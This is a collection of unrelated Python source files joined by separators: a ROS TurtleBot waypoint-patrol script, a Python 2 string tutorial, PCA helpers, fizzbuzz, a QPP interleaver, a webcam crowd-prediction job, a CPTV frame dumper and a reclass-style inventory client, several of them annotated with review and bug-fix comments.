        pose = PoseWithCovarianceStamped()
        pose.header.stamp = rospy.Time.now()
        pose.header.frame_id = 'map'
        pose.pose.pose.position.x = x
        pose.pose.pose.position.y = y
        q = transformations.quaternion_from_euler(0.0, 0.0, th/180.0*pi)
        pose.pose.pose.orientation.x = q[0]
        pose.pose.pose.orientation.y = q[1]
        pose.pose.pose.orientation.z = q[2]
        pose.pose.pose.orientation.w = q[3]
        self.set_pose_pub.publish(pose)
        return True
    def _done_cb(self, status, result):
        rospy.loginfo("navigation done! status:%d result:%s"%(status, result))
    def _active_cb(self):
        rospy.loginfo("[Navi] navigation has be actived")
    def _feedback_cb(self, feedback):
        # rospy.loginfo("[Navi] navigation feedback\r\n%s"%feedback)
        pass
    def goto(self, p):
        """Send an (x, y, yaw-degrees) goal and wait up to 60 s for the result.

        Returns True on success; NOTE(review): falls through with an implicit
        None on timeout or failure.
        """
        rospy.loginfo("[Navi] goto %s"%p)
        goal = MoveBaseGoal()
        goal.target_pose.header.frame_id = 'map'
        goal.target_pose.header.stamp = rospy.Time.now()
        goal.target_pose.pose.position.x = p[0]
        goal.target_pose.pose.position.y = p[1]
        q = transformations.quaternion_from_euler(0.0, 0.0, p[2]/180.0*pi)
        goal.target_pose.pose.orientation.x = q[0]
        goal.target_pose.pose.orientation.y = q[1]
        goal.target_pose.pose.orientation.z = q[2]
        goal.target_pose.pose.orientation.w = q[3]
        self.move_base.send_goal(goal, self._done_cb, self._active_cb, self._feedback_cb)
        result = self.move_base.wait_for_result(rospy.Duration(60))
        if not result:
            self.move_base.cancel_goal()
            rospy.loginfo("Timed out achieving goal")
        else:
            state = self.move_base.get_state()
            if state == GoalStatus.SUCCEEDED:
                rospy.loginfo("reach goal %s succeeded!"%p)
                return True
    def goto_array(self, p):
        """Send a goal given as a tf-style ((x, y, z), (qx, qy, qz, qw)) pair."""
        rospy.loginfo("[Navi] goto %s"%p[0][0])
        goal = MoveBaseGoal()
        goal.target_pose.header.frame_id = 'map'
        goal.target_pose.header.stamp = rospy.Time.now()
        goal.target_pose.pose.position.x = p[0][0]
        goal.target_pose.pose.position.y = p[0][1]
        # q = transformations.quaternion_from_euler(0.0, 0.0, p[2]/180.0*pi)
        goal.target_pose.pose.orientation.x = p[1][0]
        goal.target_pose.pose.orientation.y = p[1][1]
        goal.target_pose.pose.orientation.z = p[1][2]
        goal.target_pose.pose.orientation.w = p[1][3]
        self.move_base.send_goal(goal, self._done_cb, self._active_cb, self._feedback_cb)
        result = self.move_base.wait_for_result(rospy.Duration(60))
        if not result:
            self.move_base.cancel_goal()
            rospy.loginfo("Timed out achieving goal")
        else:
            state = self.move_base.get_state()
            if state == GoalStatus.SUCCEEDED:
                rospy.loginfo("reach goal %s succeeded!"%p[0][0])
                return True
    def cancel(self):
        """Abort all outstanding move_base goals."""
        self.move_base.cancel_all_goals()
        return True
class Rc100_service:
    """Maps RC commands (rc_partol_cmd Int32) to SLAM / map-save / patrol actions.

    Commands: 1 = stop patrol and kill gmapping + move_base,
    2 = (re)start SLAM with a fresh waypoint list,
    3 = record the current pose as a waypoint and save the map,
    4 = load the saved waypoints and start patrolling.
    """
    def __init__(self):
        self.listener=tf.TransformListener()
        self.cruisePose=CruisePose()
        rospy.Subscriber('rc_partol_cmd',Int32,self.rc_call_back)
        self.velCmdPub=rospy.Publisher('cmd_vel',Twist,queue_size=5)
        self.cnt=0                      # number of recorded waypoints
        self.old_msg=-10                # last command seen (for debouncing)
        self.stop_partol=False
        self.oldTime=rospy.Time.now()   # last time command 3 was accepted
    def __del__(self):
        # Best-effort persistence of the waypoints on shutdown.
        self.cruisePose.savePose()
        rospy.logerr('... after saveing pose and out...')
    def rc_call_back(self,msg):
        """Dispatch one RC command."""
        # Debounce: ignore repeated commands, and rate-limit command 3 to
        # at most one acceptance every 5 seconds.
        if (msg.data==self.old_msg and msg.data!=3) or (msg.data ==3 and rospy.Time.now()-self.oldTime<rospy.Duration(5)):
            return
        else:
            self.oldTime=rospy.Time.now()
            self.old_msg=msg.data
        if msg.data==1:
            # Stop everything and command zero velocity for ~3 s.
            self.stop_partol=True
            p3=subprocess.Popen("rosnode kill /turtlebot3_slam_gmapping",shell=True,stdout=subprocess.PIPE)
            p5=subprocess.Popen("rosnode kill /move_base",shell=True,stdout=subprocess.PIPE)
            tw=Twist()
            tw.linear.x=0
            tw.angular.z=0
            r = rospy.Rate(5)
            for i in range(15):
                self.velCmdPub.publish(tw)
                r.sleep()
        elif msg.data==2:
            # (Re)start SLAM and clear any previously recorded waypoints.
            p1=subprocess.Popen("roslaunch turtlebot3_slam turtlebot3_slam.launch open_rviz:="+IS_OPEN_RVIZ,shell=True,stdout=subprocess.PIPE)
            self.cruisePose.cruisePoseList=[]
        elif msg.data==3:
            # Record the current map pose as a patrol waypoint.
            # BUG FIX: `cnt` was reset to 0 on every pass through the loop,
            # so the give-up branch (cnt > 3) was unreachable and a
            # persistent tf failure spun forever. Initialise it once.
            cnt=0
            while True:
                try:
                    pose= self.listener.lookupTransform('/map', '/base_link', rospy.Time(0))
                    self.cruisePose.cruisePoseList.append(pose)
                    rospy.loginfo("get_on")
                    self.cnt+=1
                    break
                except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
                    rospy.loginfo('there is no map transfrom ')
                    cnt=cnt+1
                    if cnt>3:
                        break
                    continue
            print(self.cruisePose.cruisePoseList)
            if len(self.cruisePose.cruisePoseList)>=3:
                # Retry the map save up to 3 times, checking map_saver's
                # stdout for its "Done" marker.
                for i in range(3):
                    p2=subprocess.Popen("rosrun map_server map_saver -f "+os.getenv('HOME')+"/map",shell=True,stdout=subprocess.PIPE)
                    print('-----------------------')
                    time.sleep(3)
                    std_out_s=p2.communicate()
                    m=re.search('Done',std_out_s[0])
                    print (std_out_s[0])
                    if m is not None:
                        print ('get done')
                        break
                    else:
                        print('fail ...')
                self.cruisePose.savePose()
        elif msg.data==4:
            # Load waypoints and patrol them in a background thread.
            self.stop_partol=False
            self.cruisePose.loadPose()
            t=threading.Thread(target=start_navigation,args=(self.cruisePose.cruisePoseList,self.cruisePose.initTfLink))
            t.start()
class CruisePose:
    """Persistence for the patrol waypoints and the initial map pose."""

    def __init__(self):
        self.cruisePoseList=[]   # recorded (translation, rotation) waypoints
        self.initTfLink=[]       # map -> base_footprint transform at save time
        self.filename='cruisePoseList.json'

    def loadPose(self):
        """Restore waypoints and the initial pose from the JSON file."""
        try:
            with open(self.filename) as fh:
                (self.cruisePoseList,self.initTfLink)=json.load(fh)
        except :
            # Missing or unreadable file is tolerated; keep current state.
            rospy.logerr('when loading:FileNotFoundError')
        else:
            rospy.logerr('json load ok')

    def savePose(self):
        """Capture the current map pose and dump everything to JSON."""
        listener=tf.TransformListener()
        listener.waitForTransform("map", "base_footprint", rospy.Time(), rospy.Duration(4.0))
        self.initTfLink = listener.lookupTransform('map', 'base_footprint', rospy.Time(0))
        try:
            with open(self.filename,'w') as fh:
                json.dump((self.cruisePoseList,self.initTfLink),fh)
        except :
            rospy.logerr('when saving:FileNotFoundError')
        else:
            rospy.logerr('json save ok')
def start_navigation(cruisePoseList,pos):
    """Kill SLAM, bring up navigation with the saved map, then patrol forever.

    Runs in a background thread; loops over the recorded waypoints
    indefinitely. NOTE(review): never checks Rc100_service.stop_partol, so
    the patrol cannot be interrupted from here — confirm intended.
    """
    p3=subprocess.Popen("rosnode kill /turtlebot3_slam_gmapping",shell=True,stdout=subprocess.PIPE)
    p5=subprocess.Popen("rosnode kill /move_base",shell=True,stdout=subprocess.PIPE)
    time.sleep(3)
    # p.wait()
    p4=subprocess.Popen("roslaunch turtlebot3_navigation turtlebot3_navigation.launch open_rviz:="+IS_OPEN_RVIZ+" map_file:="+os.getenv('HOME')+"/map.yaml",shell=True,stdout=subprocess.PIPE)
    # p4.wait()
    time.sleep(10)
    navi = navigation_demo(pos)
    # navi.set_pose(init_pose)
    while True:
        for pose in cruisePoseList:
            navi.goto_array(pose)
if __name__ == "__main__":
    # Bring up the robot base, then hand control to the RC command service.
    p4=subprocess.Popen("roslaunch turtlebot3_bringup turtlebot3_robot.launch",shell=True,stdout=subprocess.PIPE)
    rospy.init_node('navigation_demo',anonymous=True)
    # goalListX = rospy.get_param('~goalListX', '2.0, 2.0')
    # goalListY = rospy.get_param('~goalListY', '2.0, 4.0')
    # goalListYaw = rospy.get_param('~goalListYaw', '0, 90.0')
    # goals = [[float(x), float(y), float(yaw)] for (x, y, yaw) in zip(goalListX.split(","),goalListY.split(","),goalListYaw.split(","))]
    rc_s=Rc100_service()
    r = rospy.Rate(1)
    r.sleep()
    rospy.spin()
|
../gasp/gasp_target_fitsheader_info_exclude_baddata_permonth.py |
# A string is a sequential set of characters; individual characters are
# accessed with the bracket operator. (Python 2 script: print statements.)
sub = "Python"
print sub[0] #Prints the first letter, "P".
#Remember: indices must be integers — sub[1.5] raises a TypeError.
print '\n'
#len() returns the length of the given string.
print len(sub) #It prints 6.
print '\n'
#Negative indices count from the end of the string.
print sub[-1] #Prints "n": the string is indexed from the reverse order.
print '\n'
#Simple traversal: visit every character using an index and len().
sub = 'python'
index=0
while index < len(sub):
    print(sub[index])
    index = index+1
print '\n'
print sub[-6]
print '\n'
#String slicing.
#The slice bounds select by position: start is inclusive, end is exclusive.
example = 'Python is best'
print example[10:13] #note: Prints only "bes", not the last character "t".
print example[:1] #prints "P".
print example[0:6] #prints "Python".
#Strings are immutable:
#we can't alter the given string in place; we overcome this by creating a
#new string which is a variation on the original, as below.
print '\n'
greetings = 'Hello World!'
new_greetings = 'J' + greetings[1:]
print new_greetings #Prints "Jello World!".
new_greetings = 'J' + greetings[:2]
print new_greetings #Prints "JHe" as output.
new_greetings = 'J' + greetings[7:]
print new_greetings #Prints "Jorld!" as output.
#LOOPING & COUNTING
#The following counts how many times the letter "p" appears in the string.
print '\n'
example = "python is best programming language"
count = 0
#Maintaining proper indentation is essential here.
for letter in example:
    if letter == 'p':
        count = count + 1
print count #prints 2 (comparison is case sensitive)
#The loop above also demonstrates the "counter" pattern of computation.
#THE in OPERATOR
#"in" is a boolean operator: True when the first string appears as a
#substring of the second.
print '\n'
'z' in 'python' #evaluates to False here ('z' is absent); the value is only echoed in the >>> REPL, not when run as a file
print '\n'
#STRING COMPARISON
#Equality and ordering work on strings; ordering follows character codes,
#so every uppercase letter sorts before every lowercase letter.
if sub == 'python': #assigned above
    print 'yeah! Its equal'
if sub < 'Python':
    print('your subject'+ sub +',comes before Python')
elif sub > 'Python':
    print('your subject'+ sub +',comes after Python') #this branch runs: 'p' > 'P'
else:
    print('All right,python')
|
import numpy as np
def compute_Z(X=np.array([[-1,-2],[-2,1],[4,-1],[1,1]]), centering=True, scaling=False):
    """Standardise the data matrix X (samples in rows, features in columns).

    :param X: (n_samples, n_features) array-like
    :param centering: subtract the per-feature mean
    :param scaling: divide by the per-feature standard deviation
    :return: the transformed copy Z (X is never mutated, so the mutable
             default argument is safe)

    Fixes over the previous version:
    - Z is always defined (the old code raised UnboundLocalError when both
      flags were False).
    - scaling now acts on the centered data instead of silently discarding
      the centering step (it divided the raw X).
    - the standard deviation is per feature (axis=0), matching the
      per-feature mean, instead of per sample (axis=1).
    - np.divide(..., where=...) now supplies `out`, so zero-variance
      features keep their values instead of receiving uninitialised memory.
    """
    Z = np.array(X, dtype=float)  # work on a float copy
    if centering:
        Z = Z - np.mean(Z, axis=0, keepdims=True)
    if scaling:
        std = np.std(Z, axis=0, keepdims=True)
        # Leave zero-variance columns unscaled rather than dividing by 0.
        Z = np.divide(Z, std, out=Z, where=std != 0)
    return Z
def compute_covariance_matrix(Z):
    """Return Z^T Z, the (unnormalised) covariance of the standardised data."""
    return np.dot(Z.T, Z)
def find_pcs(COV):
    """Eigen-decompose COV.

    Returns the pair produced by np.linalg.eig: (eigenvalues,
    eigenvectors-as-columns). Note eig does not sort by magnitude.
    """
    decomposition = np.linalg.eig(COV)
    return decomposition
def project_data(Z, PCS, L, k, var):
    """Project Z onto a subset of principal components.

    :param Z: (n_samples, n_features) standardised data
    :param PCS: eigenvector matrix (components as columns, as from np.linalg.eig)
    :param L: eigenvalues, used to pick k from a variance target
    :param k: number of components to keep; 0 means "derive k from var"
    :param var: cumulative variance fraction to exceed when k == 0
    :return: the projected data, or None when neither k nor var selects
             anything (previously an implicit, undocumented None)

    Debug prints from the previous version were removed; the selection
    logic is unchanged. Assumes PCS/L are ordered consistently by the
    caller — np.linalg.eig does not sort, TODO confirm upstream.
    """
    if k != 0:
        components = PCS.T[:k]          # first k eigenvectors as rows
        return Z.dot(components.T)
    if var != 0:
        total = sum(L)
        fractions = [eigenvalue / total for eigenvalue in L]
        cumulative = np.cumsum(fractions)
        k = 1
        for reached in cumulative:
            # Keep adding components until the variance target is exceeded.
            if var < reached:
                components = PCS.T[:k]
                return Z.dot(components.T)
            k += 1
    return None
|
#!/usr/bin/env python
def fizzbuzz(x):
    """Classic fizzbuzz: "fizz" for multiples of 3, "buzz" for multiples
    of 5, "fizzbuzz" for both, otherwise the number itself."""
    divisible_by_3 = x % 3 == 0
    divisible_by_5 = x % 5 == 0
    if divisible_by_3 and divisible_by_5:
        return "fizzbuzz"
    if divisible_by_3:
        return "fizz"
    if divisible_by_5:
        return "buzz"
    return x
|
import numpy as numpy
import importlib
import random
import PHY_frame
# QPP interleaver parameters. NOTE(review): (f1, f2, N) = (31, 64, 1024)
# matches the LTE turbo-code QPP interleaver table for K=1024, which maps
# i -> (f1*i + f2*i^2) mod N — presumably the intended formula; confirm.
sf1 = 31     # short-frame coefficient f1
sf2 = 64     # short-frame coefficient f2
lf1 = 11     # long-frame coefficient f1
lf2 = 21     # long-frame coefficient f2
sNi = 1024   # short interleaver length
lNi = 15120  # long interleaver length
def short_interleaver(index, f1=31, f2=64, N=1024):
    """QPP permutation for the short frame: (f1*i + f2*i^2) mod N.

    Defaults mirror the module constants sf1/sf2/sNi; they are parameters
    so the polynomial can be reused for other frame sizes.

    BUG FIX: the previous expression `sf1*index + (sf2*index^2 % sNi)`
    used `^`, which is bitwise XOR in Python and binds looser than `*`
    and `%`, so it computed (31*i) + ((64*i) XOR 2) — not the quadratic
    permutation polynomial. With f1 odd and f2 even, the fixed map is a
    bijection on [0, N).
    """
    return (f1 * index + f2 * index * index) % N
def long_interleaver(index, f1=11, f2=21, N=15120):
    """QPP permutation for the long frame: (f1*i + f2*i^2) mod N.

    Defaults mirror the module constants lf1/lf2/lNi.

    BUG FIX: as with short_interleaver, the old expression
    `lf1*index + (lf2*index ^2 % lNi)` XOR'ed (21*i) with 2 instead of
    squaring the index; this computes the quadratic polynomial mod N.
    """
    return (f1 * index + f2 * index * index) % N
def interleave(data, typ):
    """Scatter `data` into interleaved positions.

    :param data: sequence of symbols to permute
    :param typ: 'short'/'s' or 'long'/'l' interleaver selection
    :return: list with data placed at interleaved indices; unused slots
             hold -1
    :raises Exception: on an unrecognised `typ`

    Fixes: iterate over len(data) instead of the module-level demo list
    `x` (a latent NameError for any other caller), and compare strings
    with == rather than `is` (identity on str literals is
    implementation-dependent). Print output is unchanged (parenthesised
    form prints identically under Python 2).
    """
    if typ == 'short' or typ == 's':
        print('Using short interleaver')
        permute = short_interleaver
        modulus = sNi
    elif typ == 'long' or typ == 'l':
        print('Using long interleaver')
        permute = long_interleaver
        modulus = lNi
    else:
        raise Exception('Invalid input arguments')
    # Compute every target position once, size the output to the largest.
    positions = [permute(i % modulus) for i in range(len(data))]
    res = [-1 for _ in range(max(positions) + 1)] if positions else []
    for i, pos in enumerate(positions):
        res[pos] = data[i]
    return res
# Demo run (Python 2 print statements): interleave 0..499 with the short
# interleaver and dump the result.
x = [i for i in range(0,500)]
#z = []
z=interleave(x,'s')
print z
#y = interleave(x,'l')
#print y
# for k in range(0,len(x)):
#     z.append(long_interleaver(k%lNi))
#     print max(z)
|
from mongoengine import *
import numpy as np
import datetime
import pandas
import matplotlib.pyplot as plt
import sklearn
import sklearn.preprocessing
import sklearn.model_selection
import sklearn.linear_model
from sklearn.ensemble import RandomForestRegressor
import tabulate
import requests, json
import time
import pickle
from datetime import date, datetime, timedelta
# Webcam catalogue produced by the acquisition stage.
PATH_WEBCAM_JSON = "../acquisition/webcams.json"
# Default mongoengine connection to the local GDP-test database.
connect("GDP-test", host = "localhost", port = 27017)
class Detection(Document):
    """A people-count record for a webcam: an observation or a prediction."""
    id_webcam = IntField(required=True)
    city = StringField(required=True)
    location = StringField(required=True)
    latitude = FloatField(required=True)
    longitude = FloatField(required=True)
    numPeople = IntField(required=True)
    date = DateTimeField(required=True)
    time = DateTimeField(required=True)
    # 0 = detected from imagery, 1 = model prediction (written by predict()).
    type = IntField(required=True)
    weather_description = StringField()
    temperature = FloatField()
    day_of_week = IntField()
class weather_forecast(Document):
    """Weather forecast entries keyed by webcam coordinates and timestamp."""
    latitude = FloatField(required=True)
    longitude = FloatField(required=True)
    datetime = DateTimeField(required=True)
    weather_description = StringField()
    temperature = FloatField()
def predict(webcam):
    """Train per-webcam models on past detections and persist tomorrow-style
    hourly predictions (24 Detection documents with type=1).

    Steps: aggregate raw detections into 30-minute buckets, build a feature
    frame from today's weather forecast, train a linear regression (for
    reference metrics) and a random forest, pickle the forest, then save
    one predicted row per hour.
    """
    print(webcam["city"])
    # TODO: see whether we can fetch only the cities and run distinct queries.
    table = pandas.DataFrame(Detection.objects(city=webcam['city'],type=0).as_pymongo()) # fetch this city's raw detections
    table = table.dropna()
    print(table.shape)
    most_freq = lambda x: x.value_counts(dropna=True).index[0]
    table_a = table
    table_a = table_a.drop(columns = ['_id','id_webcam','city','type','date','location','latitude','longitude'])
    table_a['time'] = pandas.to_datetime(table_a['time'])
    table_a.sort_values(by='time', inplace=True)
    # 30-minute buckets: mean people/temperature, modal weather and weekday.
    tb = table_a.groupby([pandas.Grouper(key='time', freq='30T')], as_index=False).agg( time=('time', most_freq)
        , meanPeople=('numPeople', 'mean')
        , temp=('temperature','mean')
        , weather=('weather_description', most_freq )
        , day_of_week=('day_of_week', most_freq))
    tb = tb.dropna()
    tb.plot('time','meanPeople')
    forecast = pandas.DataFrame(weather_forecast.objects(latitude=webcam['latitude']).as_pymongo()) # fetch the forecast for this webcam's latitude
    forecast = forecast.drop(columns = ['_id','latitude','longitude'])
    forecast['datetime'] = pandas.to_datetime(forecast['datetime'])
    forecast = forecast.groupby('datetime').first().reset_index()
    forecast.sort_values(by='datetime', inplace=True)
    # Keep only today's rows (midnight to midnight).
    today = datetime.today()
    tomorrow = today + timedelta(days=1)
    midnight0 = datetime.combine(today, datetime.min.time())
    midnight1 = datetime.combine(tomorrow, datetime.min.time())
    forecast = forecast.loc[(forecast['datetime'] >= midnight0)]
    forecast = forecast.loc[(forecast['datetime'] < midnight1)].reset_index()
    # print(forecast.to_markdown())
    weekday = np.full((24,1),today.weekday())
    # Feature frame used for prediction: hour, temperature, weather, weekday.
    fc = pandas.DataFrame()
    fc.insert(0,'time', np.arange(0,24))
    fc.insert(1,'temp', forecast['temperature'].iloc[0:24])
    fc.insert(2,'weather', forecast['weather_description'].iloc[0:24])
    fc.insert(3,'day_of_week', weekday[0:24])
    print(fc)
    # Encode weather labels over the union of both sources so transform()
    # never meets an unseen class.
    forecast_dummies = fc['weather'].unique()
    print(forecast_dummies.shape)
    detection_dummies = tb['weather'].unique()
    print(detection_dummies.shape)
    # print(np.concatenate((forecast_dummies, detection_dummies), axis=0))
    le = sklearn.preprocessing.LabelEncoder()
    le.classes_ = np.unique(np.concatenate((forecast_dummies, detection_dummies), axis=0))
    fc['weather'] = le.transform(fc['weather'])
    tb['weather_dummy'] = le.transform(tb['weather'])
    print(fc)
    tb['time'] = tb['time'].dt.hour
    tb = tb.dropna()
    tb = tb.reset_index()
    # Split the dataframe 70-30 for train and test.
    x_train, x_test, y_train, y_test = sklearn.model_selection.train_test_split(
        tb[['time','temp','day_of_week','weather_dummy']],
        tb['meanPeople'],
        test_size = 0.33, shuffle = True, random_state= 42)
    # Baseline: ordinary linear regression over the full feature set.
    modelLReg = sklearn.linear_model.LinearRegression()
    modelLReg.fit(x_train, y_train)
    # The coefficients
    print('Coefficients: \n', modelLReg.coef_)
    # The mean square error
    print("Residual sum of squares: %.2f" % np.mean((modelLReg.predict(x_test) - y_test) ** 2))
    # Explained variance score: 1 is perfect prediction
    print('Variance score: %.2f' % modelLReg.score(x_test, y_test))
    # Random-forest model; pickled for later reuse (consumer unknown — TODO confirm).
    modelForest = RandomForestRegressor(n_estimators = 1000)
    modelForest.fit(x_train,y_train)
    pickle.dump(modelForest, open("modelForest_" + webcam['location'] + ".pkl", "wb"))
    print('Forest score : %.2f' % modelForest.score(x_test,y_test))
    forest_prediction= modelForest.predict(fc)
    plt.title("Random Forest")
    forest_prediction = np.rint(forest_prediction)
    # WARNING: rounding to integers loses precision.
    print(forest_prediction)
    plt.plot(fc['time'],modelForest.predict(fc))
    # timePred = datetime.today().replace(hour=0, minute=0, second=0, microsecond=0) + timedelta(days = 1)
    # timeDelta = timedelta(hours = 1)
    # xTime = []
    # xtime = np.asarray(xTime)
    # for i in range(24):
    #     xTime.append(timePred+timeDelta*i)
    # Persist the 24 hourly predictions as type=1 Detection documents.
    dtPrediction = pandas.DataFrame()
    dtPrediction.insert(0,'id_webcam', table['id_webcam'].iloc[0:24])
    dtPrediction.insert(1,'city', table['city'].iloc[0:24])
    dtPrediction.insert(2,'location', table['location'].iloc[0:24])
    dtPrediction.insert(3,'latitude', table['latitude'].iloc[0:24])
    dtPrediction.insert(4,'longitude', table['longitude'].iloc[0:24])
    dtPrediction.insert(5,'numPeople', forest_prediction[0:24])
    dtPrediction.insert(6,'date', forecast['datetime'].iloc[0:24])
    dtPrediction.insert(7,'time', forecast['datetime'].iloc[0:24])
    dtPrediction.insert(8,'type', int(1))
    dtPrediction.insert(9,'weather_description', forecast['weather_description'])
    dtPrediction.insert(10,'temperature', forecast['temperature'])
    dtPrediction.insert(11,'day_of_week', fc['day_of_week'])
    print(dtPrediction)
    for i in range(24):
        Detection(id_webcam = dtPrediction['id_webcam'][i], city = dtPrediction['city'][i],location = dtPrediction['location'][i],latitude = dtPrediction['latitude'][i],longitude = dtPrediction['longitude'][i],numPeople = dtPrediction['numPeople'][i],date = dtPrediction['date'][i],time = dtPrediction['time'][i],type = dtPrediction['type'][i],weather_description = dtPrediction['weather_description'][i],temperature = dtPrediction['temperature'][i],day_of_week = dtPrediction['day_of_week'][i]).save()
def main():
    """Run the nightly prediction loop.

    Loads the webcam list once, sleeps until five past the next midnight,
    then once per day runs ``predict`` for every webcam.

    Fixes vs. original:
    - the first sleep targeted plain midnight although the printed message
      promised ``five_past_midnight``; both now agree.
    - the bare ``except:`` is narrowed to ``Exception`` and the exception is
      printed, so Ctrl-C still stops the loop and failures are diagnosable.
    """
    # load json with webcams data
    with open(PATH_WEBCAM_JSON) as f:
        json_data = json.load(f)
    # wait until five past the next midnight (margin for the day's data to land)
    tomorrow = datetime.today() + timedelta(days=1)
    midnight = datetime.combine(tomorrow, datetime.min.time())
    five_past_midnight = midnight + timedelta(minutes=5)
    print("waiting until: " + str(five_past_midnight) +
          ";\ntime remaining: " + str(five_past_midnight - datetime.now()))
    time.sleep((five_past_midnight - datetime.now()).total_seconds())
    # infinite loop: one prediction pass per day
    while True:
        # get next day's wake-up time before starting this pass
        tomorrow = datetime.today() + timedelta(days=1)
        midnight = datetime.combine(tomorrow, datetime.min.time())
        five_past_midnight = midnight + timedelta(minutes=5)
        # loop all webcams; one failing webcam must not stop the others
        for webcam in json_data["webcams"]:
            try:
                predict(webcam)
            except Exception as exc:
                print('EXCEPTION OCCURRED:', exc)
        # sleep until five past the next midnight
        time.sleep((five_past_midnight - datetime.now()).total_seconds())
main()
|
#!/usr/bin/python3
"""Dump timestamp and per-frame min/max pixel values of a CPTV recording.

Usage: script.py <file.cptv>
"""
import sys
import pytz
from cptv import CPTVReader

local_tz = pytz.timezone('Pacific/Auckland')

# Open inside a context manager so the handle is closed even if parsing
# raises (the original opened the file and never closed it).
with open(sys.argv[1], "rb") as f:
    reader = CPTVReader(f)
    # recording start time, converted to local NZ time
    print(reader.timestamp.astimezone(local_tz))
    # each iteration yields (frame, offset); frame exposes min()/max()
    for i, (frame, offset) in enumerate(reader):
        print(i, offset, frame.min(), frame.max())
|
# -*- coding: utf-8 -*-
import os
import re
import yaml
import glob
import docutils
from collections import OrderedDict
from docutils import ApplicationError
from docutils.frontend import OptionParser
from docutils.utils import new_document
from docutils.parsers.rst import Parser
from architect import utils
from architect.inventory.client import BaseClient
from architect.inventory.models import Resource, Inventory
from celery.utils.log import get_logger
logger = get_logger(__name__)
class SectionParserVisitor(docutils.nodes.GenericNodeVisitor):
    """Docutils visitor that records the section hierarchy of a document.

    ``visit_section`` collects ``(section_id, parent_id)`` pairs;
    ``get_section_tree`` folds them into a nested dict rooted at
    ``'document-root'``.
    """

    # Kept for backward compatibility with code that reads the attribute on
    # the class; real state is per-instance (set in __init__).  The original
    # class-level list was shared by every instance, so trees from different
    # documents leaked into each other unless reset_section_tree was called.
    section_tree = []

    def __init__(self, *args, **kwargs):
        docutils.nodes.GenericNodeVisitor.__init__(self, *args, **kwargs)
        # per-instance accumulator of (node_id, parent_id) pairs
        self.section_tree = []

    def visit_section(self, node):
        """Record this section together with its nearest identified parent."""
        if node.parent is None:
            parent = 'document-root'
        else:
            parents = node.parent['ids']
            if len(parents) > 0:
                parent = parents[0]
            else:
                # parent node carries no ids: treat it as top level
                parent = 'document-root'
        self.section_tree.append((node['ids'][0], parent,))

    def default_visit(self, node):
        # all other node types are ignored
        pass

    def reset_section_tree(self):
        """Clear collected pairs so the visitor can walk another document."""
        self.section_tree = []

    def get_section_tree(self):
        """Return the collected pairs as a nested dict of section ids."""
        return self.sub_tree('document-root', self.section_tree)

    def sub_tree(self, node, relationships):
        """Recursively build {child: subtree} for children of *node*."""
        return {
            v: self.sub_tree(v, relationships)
            for v in [x[0] for x in relationships if x[1] == node]
        }
class HierClusterClient(BaseClient):
    """Inventory client for a reclass-style hierarchy on disk.

    Reads service formulas from ``metadata['formula_dir']`` and YAML classes
    from ``metadata['class_dir']`` and mirrors them into ``Resource`` rows of
    the matching ``Inventory``.
    """

    # Cache of parsed classes.
    # NOTE(review): this is a class attribute, shared by every instance of
    # the client — confirm a second inventory is not meant to get its own.
    class_cache = {}

    def __init__(self, **kwargs):
        super(HierClusterClient, self).__init__(**kwargs)

    def check_status(self):
        """Return True when both configured directories exist, else False."""
        logger.info('Checking status of hierarchy cluster "{}" ...'.format(self.name))
        status = True
        if not os.path.exists(self.metadata['formula_dir']):
            logger.error('Missing formula dir {}'.format(self.metadata['formula_dir']))
            status = False
        if not os.path.exists(self.metadata['class_dir']):
            logger.error('Missing class dir {}'.format(self.metadata['class_dir']))
            status = False
        return status

    def update_resources(self):
        """Sync formulas and classes found on disk into Resource records."""
        inventory = Inventory.objects.get(name=self.name)
        service_formulas = self.list_formulas()
        for formula_name, formula in service_formulas.items():
            res, created = Resource.objects.get_or_create(
                uid=formula_name,
                kind='service_formula',
                inventory=inventory)
            if created:
                res.metadata = formula
                res.save()
            else:
                # only touch the DB when the metadata actually changed
                if res.metadata != formula:
                    res.metadata = formula
                    res.save()
        logger.info('Processed {} service'
                    ' formulas'.format(len(service_formulas)))
        classes = self.list_classes()
        for class_name, class_meta in classes.items():
            # NOTE(review): these accumulators are re-created on every
            # iteration, so the unit loops below only ever see the classes
            # of the *last* iteration — confirm whether they were meant to
            # be initialised before the loop.
            cluster_classes = {}
            system_classes = {}
            service_classes = {}
            if '.' not in class_name:
                continue
            top_name = class_name.split('.')[1]
            if class_name.startswith('service.'):
                if top_name not in service_classes:
                    service_classes[top_name] = {}
                service_classes[top_name][class_name] = class_meta
                res, created = Resource.objects.get_or_create(
                    uid=class_name,
                    name=class_name,
                    kind='service_class',
                    inventory=inventory)
                if created:
                    # NOTE(review): unlike the formula loop above, the
                    # created branch here does not save — the metadata of a
                    # freshly created row may be lost; confirm intent.
                    res.metadata = class_meta
                else:
                    if res.metadata != class_meta:
                        res.metadata = class_meta
                        res.save()
            elif class_name.startswith('system.'):
                if top_name not in system_classes:
                    system_classes[top_name] = {}
                system_classes[top_name][class_name] = class_meta
                res, created = Resource.objects.get_or_create(
                    uid=class_name,
                    name=class_name,
                    kind='system_class',
                    inventory=inventory)
                if created:
                    # NOTE(review): same missing-save pattern as above.
                    res.metadata = class_meta
                else:
                    if res.metadata != class_meta:
                        res.metadata = class_meta
                        res.save()
            elif class_name.startswith('cluster.'):
                if top_name not in cluster_classes:
                    cluster_classes[top_name] = {}
                cluster_classes[top_name][class_name] = class_meta
                res, created = Resource.objects.get_or_create(
                    uid=class_name,
                    name=class_name,
                    kind='cluster_class',
                    inventory=inventory)
                if created:
                    # NOTE(review): same missing-save pattern as above.
                    res.metadata = class_meta
                else:
                    if res.metadata != class_meta:
                        res.metadata = class_meta
                        res.save()
        # Aggregate per-unit resources (see NOTE above about the
        # accumulators holding only the last iteration's data).
        for unit, unit_classes in cluster_classes.items():
            res, created = Resource.objects.get_or_create(
                uid=unit,
                name=unit,
                kind='cluster_unit',
                inventory=inventory)
            if created:
                res.metadata = unit_classes
            else:
                if res.metadata != unit_classes:
                    res.metadata = unit_classes
                    res.save()
        for unit, unit_classes in system_classes.items():
            res, created = Resource.objects.get_or_create(
                uid=unit,
                name=unit,
                kind='system_unit',
                inventory=inventory)
            if created:
                res.metadata = unit_classes
            else:
                if res.metadata != unit_classes:
                    res.metadata = unit_classes
                    res.save()
        logger.info('Processed {} classes'.format(len(classes)))

    def get_base_dir(self):
        """Return the configured formula directory."""
        return self.metadata['formula_dir']

    def dict_deep_merge(self, a, b, path=None):
        """
        Merges dict(b) into dict(a)

